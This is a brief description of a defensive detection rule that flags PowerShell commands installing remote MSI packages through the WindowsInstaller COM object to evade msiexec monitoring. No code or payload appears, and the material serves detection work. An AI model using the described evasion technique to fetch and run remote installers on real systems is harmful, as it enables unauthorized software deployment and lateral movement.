This detection rule identifies malicious execution attempts of PowerShell commands designed to install MSI packages via the Windows Installer COM object, specifically when the installation is initiated from a remote location. The use of the WindowsInstaller COM object (`WindowsInstaller.Installer`) signifies an advanced tactic that may attempt to bypass traditional detection mechanisms which generally monitor `msiexec`. This behavior can signify either deployment of unauthorized software or lateral movement within a network. The rule captures events based on specific command line arguments characteristic of such installations and ensures that local installations do not trigger false positives by including filters for localhost references. When the command line contains both references to the COM object and remote locations, while not being solely focused on localhost, it qualifies as indicative of potentially malicious activity.